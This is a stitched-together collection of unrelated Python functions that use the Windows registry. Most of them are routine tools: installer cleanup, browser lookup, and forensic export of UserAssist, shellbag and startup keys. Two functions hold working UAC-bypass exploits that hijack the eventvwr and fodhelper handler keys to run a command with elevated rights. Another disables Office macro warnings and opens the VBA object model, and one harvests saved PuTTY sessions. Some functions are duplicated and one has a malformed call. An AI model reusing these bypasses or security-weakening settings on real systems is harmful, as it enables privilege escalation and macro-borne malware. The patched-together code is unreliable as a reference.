def main(): """ Enumerate all installed products, go through all components and check if client refences point to valid products. Remove references to non-existing products if the user allowed it. """ hkey_components = OpenKey(HKEY_LOCAL_MACHINE, COMPONENTS_KEY, 0, KEY_ALL_ACCESS) missing_products = get_missing_products(hkey_components) print('Missing products refer the following components:') for product_guid in sorted(missing_products.keys()): if product_guid[1:] == '0' * 31: continue print('Product', transpose_guid(product_guid) + ':') for component_guid, component_file in missing_products[product_guid]: print(' ' + transpose_guid(component_guid), '=', component_file) print('Remove all references to product', transpose_guid(product_guid) + '? [y/n]') if strtobool(raw_input().lower()): for component_guid, component_file in missing_products[ product_guid]: hkey_component = OpenKey(hkey_components, component_guid, 0, KEY_ALL_ACCESS) print( 'Removing reference in ' + transpose_guid(component_guid), '=', component_file) DeleteValue(hkey_component, product_guid) CloseKey(hkey_component) else: print('Cancelled removal of product', transpose_guid(product_guid)) CloseKey(hkey_components)
def _Find(Key, SubKey): #print 'Key/SubKey',Key,SubKey key = OpenKey(Key, SubKey) N, v, w = QueryInfoKey(key) for i in range(N): DB_Name = EnumKey(key, i) #print 'DB_Name',key,i,DB_Name DB_Key = SubKey + '\\' + DB_Name #print 'Key/DB_Key',Key,DB_Key try: key_sub = OpenKey(Key, DB_Key) M, v, w = QueryInfoKey(key_sub) for ii in range(v): key_value = EnumValue(key_sub, ii) # NOT YET COMPLETE if key_value[0] in ['DBQ', 'Database', 'EngineName']: ODBC_DBs.append([DB_Name, key_value[1]]) CloseKey(key_sub) except: if Key == HKEY_CURRENT_USER: print 'ODBC Database not found: HKEY_CURRENT_USER', DB_Key else: print 'ODBC Database not found: HKEY_LOCAL_MACHINE', DB_Key CloseKey(key)
def set_keys(self): baseOfficeKeyPath = r"Software\Microsoft\Office" installedVersions = list() try: officeKey = OpenKey(HKEY_CURRENT_USER, baseOfficeKeyPath, 0, KEY_READ) for currentKey in xrange(0, QueryInfoKey(officeKey)[0]): isVersion = True officeVersion = EnumKey(officeKey, currentKey) if "." in officeVersion: for intCheck in officeVersion.split("."): if not intCheck.isdigit(): isVersion = False break if isVersion: installedVersions.append(officeVersion) CloseKey(officeKey) except WindowsError: # Office isn't installed at all return for oVersion in installedVersions: key = CreateKeyEx( HKEY_CURRENT_USER, r"{0}\{1}\Publisher\Security".format(baseOfficeKeyPath, oVersion), 0, KEY_SET_VALUE) SetValueEx(key, "VBAWarnings", 0, REG_DWORD, 1) SetValueEx(key, "AccessVBOM", 0, REG_DWORD, 1) SetValueEx(key, "ExtensionHardening", 0, REG_DWORD, 0) CloseKey(key)
def get_installed_products(): """ Enumerate all installed products. """ products = {} hkey_products = OpenKey(HKEY_LOCAL_MACHINE, PRODUCTS_KEY, 0, KEY_ALL_ACCESS) try: product_index = 0 while True: product_guid = EnumKey(hkey_products, product_index) hkey_product_properties = OpenKey( hkey_products, product_guid + r'\InstallProperties', 0, KEY_ALL_ACCESS) try: value = QueryValueEx(hkey_product_properties, 'DisplayName')[0] except WindowsError as oXcpt: if oXcpt.winerror != 2: raise value = '<unknown>' CloseKey(hkey_product_properties) products[product_guid] = value product_index += 1 except WindowsError as oXcpt: if oXcpt.winerror != 259: print(oXcpt.strerror + '.', 'error', oXcpt.winerror) CloseKey(hkey_products) print('Installed products:') for product_key in sorted(products.keys()): print(transpose_guid(product_key), '=', products[product_key]) print() return products
def default_browser_command(): if WIN32: if six.PY2: from _winreg import (CloseKey, ConnectRegistry, HKEY_CLASSES_ROOT, # pylint: disable=import-error,no-name-in-module HKEY_CURRENT_USER, OpenKey, QueryValueEx) else: from winreg import (CloseKey, ConnectRegistry, HKEY_CLASSES_ROOT, # pylint: disable=import-error,no-name-in-module HKEY_CURRENT_USER, OpenKey, QueryValueEx) ''' Tries to get default browser command, returns either a space delimited command string with '%1' as URL placeholder, or empty string. ''' browser_class = 'Software\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\https\\UserChoice' try: reg = ConnectRegistry(None,HKEY_CURRENT_USER) key = OpenKey(reg, browser_class) value, t = QueryValueEx(key, 'ProgId') CloseKey(key) CloseKey(reg) reg = ConnectRegistry(None,HKEY_CLASSES_ROOT) key = OpenKey(reg, '%s\\shell\\open\\command' % value) path, t = QueryValueEx(key, None) except WindowsError: # pylint: disable=undefined-variable # logger.warn(e) traceback.print_exc() return '' finally: CloseKey(key) CloseKey(reg) return path else: default_browser = webbrowser.get() return default_browser.name + " %1"
def _csv_user_assist(self, count_offset, is_win7_or_further): ''' Extracts information from UserAssist registry key which contains information about executed programs ''' ''' The count offset is for Windows versions before 7, where it would start at 6... ''' self.logger.info('Getting user_assist from registry') aReg = ConnectRegistry(None, HKEY_USERS) str_user_assist = 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\' with open( self.output_dir + '\\' + self.computer_name + '_userassist.csv', 'wb') as output: csv_writer = get_csv_writer(output) for index_sid in range( QueryInfoKey(aReg)[0]): # the number of subkeys # in HKEY_USERS, we have a list of subkeys which are SIDs str_sid = EnumKey(aReg, index_sid) try: path = str_sid + '\\' + str_user_assist username = str_sid2username(str_sid) reg_user_assist = OpenKey(aReg, path) for index_clsid in range(QueryInfoKey(reg_user_assist) [0]): # the number of subkeys # in UserAssist, we have a list of IDs which may vary between different Windows versions str_clsid = EnumKey(reg_user_assist, index_clsid) result = [username, str_sid, str_clsid] reg_count = OpenKey(aReg, path + str_clsid + '\\Count') date_last_mod = convert_windate( QueryInfoKey(reg_count)[2]) for index_value in range(QueryInfoKey(reg_count) [1]): # the number of values # the name of the value is encoded with ROT13 str_value_name = EnumValue(reg_count, index_value)[0] str_value_name = codecs.decode( str_value_name, 'rot_13') str_value_datatmp = EnumValue( reg_count, index_value)[1] # some data are less than 16 bytes for some reason... if len(str_value_datatmp) < 16: write_to_csv( result + [str_value_name, date_last_mod], csv_writer) else: if is_win7_or_further: arr_output = result + [ str_value_name, date_last_mod ] + self.__csv_user_assist_value_decode_win7_and_after( str_value_datatmp, count_offset) write_to_csv(arr_output, csv_writer) else: write_to_csv( result + [str_value_name, date_last_mod] + self. __csv_user_assist_value_decode_before_win7( str_value_datatmp, count_offset), csv_writer) CloseKey(reg_count) CloseKey(reg_user_assist) except WindowsError: pass CloseKey(aReg)
def csv_startup_programs(self): ''' Exports the programs running at startup ''' ''' [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Userinit] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceEx] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] ''' self.logger.info("Getting startup programs from registry") software = '\Software' wow = '\Wow6432Node' with open(self.output_dir + '\\' + self.computer_name + '_startup.csv', 'wb') as output: csv_writer = get_csv_writer(output) aReg = ConnectRegistry(None, HKEY_USERS) for index_sid in range(QueryInfoKey(aReg)[0]): # the number of subkeys # in HKEY_USERS, we have a list of subkeys which are SIDs str_sid = EnumKey(aReg, index_sid) username = str_sid2username(str_sid) paths = ['\Microsoft\Windows\CurrentVersion\Run\\', '\Microsoft\Windows\CurrentVersion\RunOnce\\', '\Software\Microsoft\Windows\CurrentVersion\RunOnceEx', '\Microsoft\Windows\CurrentVersion\RunServices\\', '\Microsoft\Windows\CurrentVersion\RunServicesOnce\\', '\Microsoft\Windows NT\CurrentVersion\Winlogon\\Userinit\\'] for path in paths: try: full_path = str_sid + software + path self._dump_csv_registry_to_output('HKEY_USERS', full_path, aReg, csv_writer, username) full_path = str_sid + software + wow + path self._dump_csv_registry_to_output('HKEY_USERS', full_path, aReg, csv_writer, username) except WindowsError: pass CloseKey(aReg) with open(self.output_dir + '\\' + self.computer_name + '_startup.csv', 'ab') as output: csv_writer = get_csv_writer(output) aReg = ConnectRegistry(None, HKEY_LOCAL_MACHINE) paths = ['\Microsoft\Windows\CurrentVersion\Run\\', '\Microsoft\Windows\CurrentVersion\RunOnce\\', '\Software\Microsoft\Windows\CurrentVersion\RunOnceEx', '\Microsoft\Windows\CurrentVersion\RunServices\\', '\Microsoft\Windows\CurrentVersion\RunServicesOnce\\', '\Microsoft\Windows NT\CurrentVersion\Windows\\', '\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'] for path in paths: try: full_path = software + path self._dump_csv_registry_to_output('HKEY_LOCAL_MACHINE', path, aReg, csv_writer) full_path = software + wow + path self._dump_csv_registry_to_output('HKEY_LOCAL_MACHINE', path, aReg, csv_writer) except WindowsError: pass CloseKey(aReg)
def modifyKey(keyPath, regPath, value, root=HKEY_LOCAL_MACHINE): aReg = ConnectRegistry(None, root) if not setRegValue(aReg, keyPath, regPath, value): CloseKey(aReg) return False CloseKey(aReg) return True
def _csv_open_save_MRU(self, str_opensaveMRU): ''' Extracts information from OpenSaveMRU registry key which contains information about opened and saved windows ''' # TODO : Win XP self.logger.info('Getting open_save_MRU from registry') aReg = ConnectRegistry(None, HKEY_USERS) with open( self.output_dir + '\\' + self.computer_name + '_opensaveMRU.csv', 'wb') as output: csv_writer = get_csv_writer(output) for index_sid in range( QueryInfoKey(aReg)[0]): # the number of subkeys # in HKEY_USERS, we have a list of subkeys which are SIDs str_sid = EnumKey(aReg, index_sid) try: username = str_sid2username(str_sid) path = str_sid + '\\' + str_opensaveMRU reg_opensaveMRU = OpenKey(aReg, path) for index_clsid in range(QueryInfoKey(reg_opensaveMRU) [0]): # the number of subkeys str_filetype = EnumKey(reg_opensaveMRU, index_clsid) reg_filetype = OpenKey(aReg, path + '\\' + str_filetype) date_last_mod = convert_windate( QueryInfoKey(reg_filetype)[2]) # now get the value from the SID subkey for index_value in range( QueryInfoKey(reg_filetype) [1]): # the number of values value_filetype = EnumValue(reg_filetype, index_value) # Here, it is quite... dirty, it is a binary MRU list in which we have to extract the interesting values if value_filetype[0] != 'MRUListEx': l_printable = self.__extract_filename_from_PIDLMRU( value_filetype[1]) # VERY DIRTY, if the list is empty it's probably because the string is off by 1... if len(l_printable) == 0: # So we take away the first char to have a correct offset (modulo 2) l_printable = self.__extract_filename_from_PIDLMRU( value_filetype[1][1:]) if len(l_printable) != 0: str_printable = l_printable[-1] write_to_csv([ username, str_sid, str_filetype, date_last_mod, str_printable ], csv_writer) else: # if the length is still 0 then... I'm at a loss for words write_to_csv([ username, str_sid, str_filetype, date_last_mod ], csv_writer) CloseKey(reg_filetype) CloseKey(reg_opensaveMRU) except WindowsError: pass CloseKey(aReg)
def __win32_finddll(): try: import winreg except ImportError: # assume Python 2 from _winreg import ( OpenKey, CloseKey, EnumKey, QueryValueEx, QueryInfoKey, HKEY_LOCAL_MACHINE, ) else: from winreg import ( OpenKey, CloseKey, EnumKey, QueryValueEx, QueryInfoKey, HKEY_LOCAL_MACHINE, ) from distutils.version import LooseVersion import os dlls = [] # Look up different variants of Ghostscript and take the highest # version for which the DLL is to be found in the filesystem. for key_name in ( "AFPL Ghostscript", "Aladdin Ghostscript", "GNU Ghostscript", "GPL Ghostscript", ): try: k1 = OpenKey(HKEY_LOCAL_MACHINE, "Software\\%s" % key_name) for num in range(0, QueryInfoKey(k1)[0]): version = EnumKey(k1, num) try: k2 = OpenKey(k1, version) dll_path = QueryValueEx(k2, "GS_DLL")[0] CloseKey(k2) if os.path.exists(dll_path): dlls.append((LooseVersion(version), dll_path)) except WindowsError: pass CloseKey(k1) except WindowsError: pass if dlls: dlls.sort() return dlls[-1][-1] else: return None
def ssh_putty_hosts(): results = {} try: h = OpenKey(HKEY_USERS, '') except WindowsError: return idx = 0 try: while True: user = EnumKey(h, idx) username, domain, _ = LookupAccountSidW(user) if username is None: username = user if domain: user = domain + '\\' + user for reg_path in REG_PATHS: try: sessions = user + reg_path h2 = OpenKey(HKEY_USERS, sessions) except WindowsError: continue try: idx2 = 0 while True: session = EnumKey(h2, idx2) record = extract_info(sessions + '\\' + session) if record: if username not in results: results[username] = {} results[username].update(record) idx2 += 1 except WindowsError: pass finally: CloseKey(h2) idx += 1 except WindowsError: return results finally: CloseKey(h)
def registry_hijacking_eventvwr(cmd, params=""): # ''' # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) # ''' HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) mscCmdPath = r'Software\Classes\mscfile\shell\open\command' if params: cmd = '%s %s'.strip() % (cmd, params) try: # The registry key already exist in HKCU, altering... registry_key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE) except: # Adding the registry key in HKCU registry_key = CreateKey(HKCU, mscCmdPath) SetValueEx(registry_key, '', 0, REG_SZ, cmd) CloseKey(registry_key) # Executing eventvwr.exe eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe') subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True) # Sleeping 5 secds... time.sleep(5) #Clean everything DeleteKey(HKCU, mscCmdPath)
def _dump_csv_registry_to_output(self, hive_name, path, hive, csv_writer, username=None, optional_function=None, is_recursive=True): ''' Dumps the registry in the given output file object Path should end with the '\' (for concat reasons) ''' try: reg_key = OpenKey(hive, path) # print values from key date_last_mod = convert_windate(QueryInfoKey(reg_key)[2]) self.__print_regkey_values_csv(reg_key, date_last_mod, hive_name, path, csv_writer, username, optional_function) if is_recursive: for index_subkey in range( QueryInfoKey(reg_key)[0]): # the number of subkeys # then go further in the tree str_subkey = EnumKey(reg_key, index_subkey) self._dump_csv_registry_to_output(hive_name, path + str_subkey + '\\', hive, csv_writer, username, optional_function) CloseKey(reg_key) except WindowsError as e: if e.winerror == 5: # Access denied pass else: raise e
def _iter_log_names(self): dups = set() for well_known in ('Application', 'Security', 'System'): dups.add(well_known) yield well_known key = OpenKeyEx(HKEY_LOCAL_MACHINE, r'SYSTEM\CurrentControlSet\Services\EventLog', 0, KEY_READ) try: idx = 0 while True: try: source = EnumKey(key, idx) if source in dups: continue dups.add(source) yield source except WindowsError: break finally: idx += 1 finally: CloseKey(key)
def get_missing(cls, path, required): """ Checks required entries from the Windows registry. @param path: registry path to list of installed software @type path: str @param required: list of entries to check @type required: list @return: list of missing entries @rtype: list """ reg = ConnectRegistry(None, HKEY_LOCAL_MACHINE) logging.getLogger().debug("Registry path: %s " % path) try: key = OpenKey(reg, path, 0, KEY_READ | KEY_WOW64_32KEY) except WindowsError: # pyflakes.ignore logging.getLogger().warn("Unable to get registry path: %s " % path) logging.getLogger().warn("Cannot check missing software") return [] missing = required i = 0 while True: try: folder = EnumKey(key, i) if folder in missing: missing.remove(folder) i += 1 except WindowsError: # pyflakes.ignore break CloseKey(key) return missing
def extend_user_env_windows(name, value, mode): '''NEVER call this function directly. Use the safer and platform-neutral 'extend_user_env' instead.''' # !! We're messing with the Windows Registry here, edit with care !! import _winreg from _winreg import OpenKey, QueryValueEx, SetValueEx, CloseKey user_env = OpenKey(_winreg.HKEY_CURRENT_USER, 'Environment', 0, _winreg.KEY_ALL_ACCESS) try: old_value, old_value_type = QueryValueEx(user_env, name) assert old_value_type in (_winreg.REG_SZ, _winreg.REG_EXPAND_SZ) except WindowsError: old_value, old_value_type = '', _winreg.REG_SZ if not old_value or mode == 'o': new_value = value elif mode == 'a': new_value = os.pathsep.join((old_value, value)) else: # mode == 'p' new_value = os.pathsep.join((value, old_value)) if old_value_type == _winreg.REG_SZ and value.find('%') != -1: new_value_type = _winreg.REG_EXPAND_SZ else: new_value_type = old_value_type SetValueEx(user_env, name, 0, new_value_type, new_value) CloseKey(user_env)
def get_missing_products(hkey_components): """ Detect references to missing products. """ products = get_installed_products() missing_products = {} for component_index in xrange(0, QueryInfoKey(hkey_components)[0]): component_guid = EnumKey(hkey_components, component_index) hkey_component = OpenKey(hkey_components, component_guid, 0, KEY_ALL_ACCESS) clients = [] for value_index in xrange(0, QueryInfoKey(hkey_component)[1]): client_guid, client_path = EnumValue(hkey_component, value_index)[:2] clients.append((client_guid, client_path)) if not client_guid in products: if client_guid in missing_products: missing_products[client_guid].append( (component_guid, client_path)) else: missing_products[client_guid] = [(component_guid, client_path)] CloseKey(hkey_component) return missing_products
def get_installed_products(): """ Enumerate all installed products. """ products = {} hkey_products = OpenKey(HKEY_LOCAL_MACHINE, PRODUCTS_KEY, 0, KEY_ALL_ACCESS) try: product_index = 0 while True: product_guid = EnumKey(hkey_products, product_index) hkey_product_properties = OpenKey( hkey_products, product_guid + r'\InstallProperties', 0, KEY_ALL_ACCESS) try: value = QueryValueEx(hkey_product_properties, 'DisplayName')[0] except WindowsError, exception: if exception.winerror != 2: raise value = '<unknown>' CloseKey(hkey_product_properties) products[product_guid] = value product_index += 1 except WindowsError, exceptione: if exceptione.winerror != 259: print exceptione.strerror + '.', 'error', exceptione.winerror
def _get_key_info(self, key_name): ''' Extract information from the registry concerning the USB key ''' #HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed} str_reg_key_usbinfo = "SYSTEM\ControlSet001\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}\\" # here is a sample of a key_name # ##?#USBSTOR#Disk&Ven_&Prod_USB_DISK_2.0&Rev_PMAP#07BC13025A3B03A1&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} # the logic is : there are 6 '#' so we should split this string on '#' and get the USB id (index 5) index_id = 5 usb_id = key_name.split('#')[index_id] # now we want only the left part of the which may contain another separator '&' -> 07BC13025A3B03A1&0 usb_id = usb_id.split('&')[0] # next we look in the registry for such an id key_ids = "" reg_key_info = OpenKey(self.aReg, str_reg_key_usbinfo) for i in range(QueryInfoKey(reg_key_info)[0]): # the number of subkeys try: subkey_name = EnumKey(reg_key_info, i) if usb_id in subkey_name: # example of a key_info_name # ##?#USB#VID_26BD&PID_9917#0702313E309E0863#{a5dcbf10-6530-11d2-901f-00c04fb951ed} # the pattern is quite similar, a '#' separated string, with 5 as key id and 4 as VID&PID, we need those 2 index_id = 4 key_ids = subkey_name.split('#')[index_id] break except EnvironmentError: break CloseKey(reg_key_info) return key_ids
def csv_windows_values(self): # outputs winlogon's values to file self.logger.info('Getting windows values from registry') path = 'Software\Microsoft\Windows NT\CurrentVersion\Windows\\' with open( self.output_dir + '\\' + self.computer_name + '_windows_values.csv', 'wb') as output: aReg = ConnectRegistry(None, HKEY_LOCAL_MACHINE) csv_writer = get_csv_writer(output) try: self._dump_csv_registry_to_output('HKEY_LOCAL_MACHINE', path, aReg, csv_writer, is_recursive=False) aReg = ConnectRegistry(None, HKEY_USERS) for index_sid in range( QueryInfoKey(aReg)[0]): # the number of subkeys # in HKEY_USERS, we have a list of subkeys which are SIDs str_sid = EnumKey(aReg, index_sid) username = str_sid2username(str_sid) full_path = str_sid + '\\' + path try: self._dump_csv_registry_to_output('HKEY_USERS', full_path, aReg, csv_writer, username, is_recursive=False) except WindowsError: pass except WindowsError: pass CloseKey(aReg)
def add_registry_entry(name, node_id): """ Adds a node to registry. :param name: Node name. :type name: String :param id: Node id. :type id: Integer """ keys = ['Software', 'Classes', '*', 'shell', 'DiWaCS: Open in {0}'.format(name), 'command'] key = '' for k, islast in IterIsLast(keys): key += k if key == '' else '\\' + k try: rkey = OpenKey(HKEY_CURRENT_USER, key, 0, KEY_ALL_ACCESS) except: rkey = CreateKey(HKEY_CURRENT_USER, key) if islast: rpath = u'send_file_to.exe {0} "%1"'.format(node_id) regpath = os.path.join(os.getcwdu(), rpath) SetValueEx(rkey, '', 0, REG_SZ, regpath) if rkey: CloseKey(rkey)
def registry_hijacking_fodhelper(cmd, params=""): HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) fodhelperPath = r'Software\Classes\ms-settings\Shell\Open\command' if params: cmd = '%s %s'.strip() % (cmd, params) try: # The registry key already exist in HKCU, altering... OpenKey(HKCU, fodhelperPath, KEY_SET_VALUE) except: # Adding the registry key in HKCU CreateKey(HKCU, fodhelperPath) registry_key = OpenKey(HKCU, fodhelperPath, 0, KEY_WRITE) SetValueEx(registry_key, 'DelegateExecute', 0, REG_SZ, "") SetValueEx(registry_key, '', 0, REG_SZ, cmd) CloseKey(registry_key) # Creation fodhelper.exe path triggerPath = os.path.join(os.environ['WINDIR'],'System32','fodhelper.exe') # Disables file system redirection for the calling thread (File system redirection is enabled by default) wow64 = ctypes.c_long(0) ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64)) # Executing fodhelper.exe subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True) # Enable file system redirection for the calling thread ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64) # Sleeping 5 secds... time.sleep(5) # Clean everything DeleteKey(HKCU, fodhelperPath)
def csv_shell_bags(self): ''' Exports the shell bags from Windows registry in a csv ''' # TODO Check Vista and under self.logger.info("Getting shell bags from registry") aReg = ConnectRegistry(None, HKEY_USERS) with open( self.output_dir + '\\' + self.computer_name + '_shellbags.csv', 'wb') as output: csv_writer = get_csv_writer(output) for index_sid in range( QueryInfoKey(aReg)[0]): # the number of subkeys # in HKEY_USERS, we have a list of subkeys which are SIDs str_sid = EnumKey(aReg, index_sid) username = str_sid2username(str_sid) paths = [ '\\Software\\Microsoft\\Windows\\Shell\\Bags\\', '\\Software\\Microsoft\\Windows\\Shell\\BagMRU\\', '\\Software\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\Bags\\', '\\Software\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\BagMRU\\' ] for path in paths: try: full_path = str_sid + path self._dump_csv_registry_to_output( 'HKEY_USERS', full_path, aReg, csv_writer, username, self.__decode_shellbag_itempos_data) except WindowsError: pass CloseKey(aReg)
def csv_recent_docs(self): # Shows where recently opened files are saved and when they were opened self.logger.info('Getting recent_docs from registry') path = '\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\\' aReg = ConnectRegistry(None,HKEY_USERS) with open(self.output_dir + '\\' + self.computer_name + '_recent_docs.csv', 'wb') as output: csv_writer = get_csv_writer(output) for index_sid in range(QueryInfoKey(aReg)[0]): # the number of subkeys (SIDs) str_sid = EnumKey(aReg, index_sid) full_path = str_sid + path try: username = str_sid2username(str_sid) result = [username, str_sid] reg_recent_docs = OpenKey(aReg, full_path) # Get values of RecentDocs itself for index_value in range(QueryInfoKey(reg_recent_docs)[1]): # the number of values (RecentDocs) str_value_name = EnumValue(reg_recent_docs, index_value)[0] str_value_datatmp = EnumValue(reg_recent_docs, index_value)[1] if str_value_name != "MRUListEx": value_decoded = self.__decode_recent_docs_MRU(str_value_datatmp) write_to_csv(result + value_decoded, csv_writer) # Get values of RecentDocs subkeys for index_recent_docs_subkey in range(QueryInfoKey(reg_recent_docs)[0]): # the number of subkeys (RecentDocs) recent_docs_subkey = EnumKey(reg_recent_docs, index_recent_docs_subkey) reg_recent_docs_subkey = OpenKey(aReg, full_path + recent_docs_subkey) for index_value in range(QueryInfoKey(reg_recent_docs_subkey)[1]): # the number of values (RecentDocs subkeys) str_value_name = EnumValue(reg_recent_docs_subkey, index_value)[0] str_value_datatmp = EnumValue(reg_recent_docs_subkey, index_value)[1] if str_value_name != "MRUListEx": value_decoded = self.__decode_recent_docs_MRU(str_value_datatmp) write_to_csv(result + value_decoded, csv_writer) #self._dump_csv_registry_to_output('HKEY_USERS', full_path, aReg, csv_writer, username) except WindowsError: pass CloseKey(aReg)
def setRegValue(aReg, keyPath, regPath, value): try: aKey = OpenKey(aReg, keyPath, 0, KEY_WRITE) SetValueEx(aKey, regPath, 0, REG_DWORD, value) CloseKey(aKey) return True except: return False
def get_current_wallpaper(win): """ Try to get the current wallpaper image path. :param win: Windows version (Major, Minor). :type win: Tuple of Integers :returns: Wallpaper image path if it can find it. :rtype: String """ wallpaper = None wallpaper_path = '' key = None default_entry = None reg_location = None LOGGER.debug('get_current_wallpaper: ' + str(win)) if win[0] == 5: # XP == 5,1 XP64 == 5,2 reg_location = __WIN_XP_REG elif win[0] == 6: reg_location = __WIN_VISTA7_REG if win[1] == 0: # Vista default_entry = r'Microsoft\Windows\Themes\TranscodedWallpaper.jpg' elif win[1] == 1: # Windows 7 default_entry = r'Microsoft\Windows\Themes\TranscodedWallpaper.jpg' elif win[1] == 2: # Windows 8 default_entry = r'Microsoft\Windows\Themes\TranscodedWallpaper' try: # Try the defualt location if available. if default_entry and ('APPDATA' in os.environ): wallpaper_path = os.path.join(os.environ['APPDATA'], default_entry) LOGGER.debug('Accessing: ' + wallpaper_path) # Get current current_wallpaper from registry if needed. if wallpaper_path and os.path.exists(wallpaper_path): wallpaper = wallpaper_path # We might have the default wallpaper now, but let's try # replace it with the current one... if reg_location: LOGGER.debug('reg_location: ' + str(reg_location)) key = OpenKey(HKEY_CURRENT_USER, reg_location) LOGGER.debug('key: ' + str(key) + ' open!') wallpaper_path = QueryValueEx(key, 'Wallpaper')[0] LOGGER.debug('keyval: ' + str(wallpaper_path)) if wallpaper_path.count('%') > 1: index_start = wallpaper_path.find('%') index_end = wallpaper_path.find('%', index_start + 1) env = wallpaper_path[index_start + 1:index_end] end = wallpaper_path[index_end + 2:] wallpaper_path = os.path.join(os.getenv(env), end) LOGGER.debug('keyval2: ' + str(wallpaper_path)) if (wallpaper_path) and len(wallpaper_path): wallpaper = wallpaper_path except (ValueError, IOError, OSError) as excp: LOGGER.exception('get_current_wallpaper exception: {0!s}'.format(excp)) if key is not None: CloseKey(key) return wallpaper
def modifyKey(keyPath, regPath, value, root=HKEY_LOCAL_MACHINE): aReg = ConnectRegistry(None, root) try: aKey = OpenKey(aReg, keyPath, 0, KEY_WRITE) SetValueEx(aKey, regPath, 0, REG_DWORD, value) CloseKey(aKey) except Exception, e: return False, e
def create_tcp_port(self, port_name, ip_address, port=9100): base_path = (r'SYSTEM\ControlSet001\Control' r'\Print\Monitors\Standard TCP/IP Port\Ports') reg_key = OpenKey(HKEY_LOCAL_MACHINE, base_path, 0, KEY_ALL_ACCESS) try: _ = QueryValueEx(reg_key, 'StatusUpdateEnabled')[0] # noqa except WindowsError: SetValueEx(reg_key, 'StatusUpdateEnabled', 0, REG_DWORD, 1) try: _ = QueryValueEx(reg_key, 'StatusUpdateInterval')[0] # noqa except WindowsError: SetValueEx(reg_key, 'StatusUpdateInterval', 0, REG_DWORD, 10) CloseKey(reg_key) try: _ = OpenKey(HKEY_LOCAL_MACHINE, r'{base}\{port}'.format(base=base_path, port=port_name), 0, KEY_ALL_ACCESS) # noqa print "There is already a port named :" + port_name return False except WindowsError: try: reg_key = OpenKey(HKEY_LOCAL_MACHINE, base_path, 0, KEY_ALL_ACCESS) CreateKey(reg_key, port_name) CloseKey(reg_key) reg_key = OpenKey( HKEY_LOCAL_MACHINE, base_path + '\\' + port_name, r'{base}\{port}'.format(base=base_path, port=port_name), 0, KEY_ALL_ACCESS) SetValueEx(reg_key, 'Protocol', 0, REG_DWORD, 1) SetValueEx(reg_key, 'Version', 0, REG_DWORD, 1) SetValueEx(reg_key, 'HostName', 0, REG_SZ, '') SetValueEx(reg_key, 'IPAddress', 0, REG_SZ, ip_address) SetValueEx(reg_key, 'HWAddress', 0, REG_SZ, '') SetValueEx(reg_key, 'PortNumber', 0, REG_DWORD, port) SetValueEx(reg_key, 'SNMP Community', 0, REG_SZ, 'public') SetValueEx(reg_key, 'SNMP Enabled', 0, REG_DWORD, 1) SetValueEx(reg_key, 'SNMP Index', 0, REG_DWORD, 1) result = self.__restart_win_service('Spooler') return result except Exception: # noqa return False
def clean_flag(self): self.logger.debug("Setting registry key to 'no' %s %s" % (self.config.flag[0], self.config.flag[1])) self.checked_flag = False try: key = OpenKey(HKEY_LOCAL_MACHINE, self.config.flag[0], 0, KEY_SET_VALUE) SetValueEx(key, self.config.flag[1], 0, REG_SZ, "no") CloseKey(key) self.logger.debug("Registry key value set") except Exception, e: self.logger.error("Can't change registry key value: %s", str(e))
def default_browser_command(): if sys.platform.startswith('win'): if six.PY2: from _winreg import ( CloseKey, ConnectRegistry, HKEY_CLASSES_ROOT, # pylint: disable=import-error HKEY_CURRENT_USER, OpenKey, QueryValueEx) else: from winreg import ( CloseKey, ConnectRegistry, HKEY_CLASSES_ROOT, # pylint: disable=import-error HKEY_CURRENT_USER, OpenKey, QueryValueEx) ''' Tries to get default browser command, returns either a space delimited command string with '%1' as URL placeholder, or empty string. ''' browser_class = 'Software\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\https\\UserChoice' try: reg = ConnectRegistry(None, HKEY_CURRENT_USER) key = OpenKey(reg, browser_class) value, t = QueryValueEx(key, 'ProgId') CloseKey(key) CloseKey(reg) reg = ConnectRegistry(None, HKEY_CLASSES_ROOT) key = OpenKey(reg, '%s\\shell\\open\\command' % value) path, t = QueryValueEx(key, None) except WindowsError: # logger.warn(e) traceback.print_exc() return '' finally: CloseKey(key) CloseKey(reg) return path else: printer.out("default_browser_command: Not implemented for OS")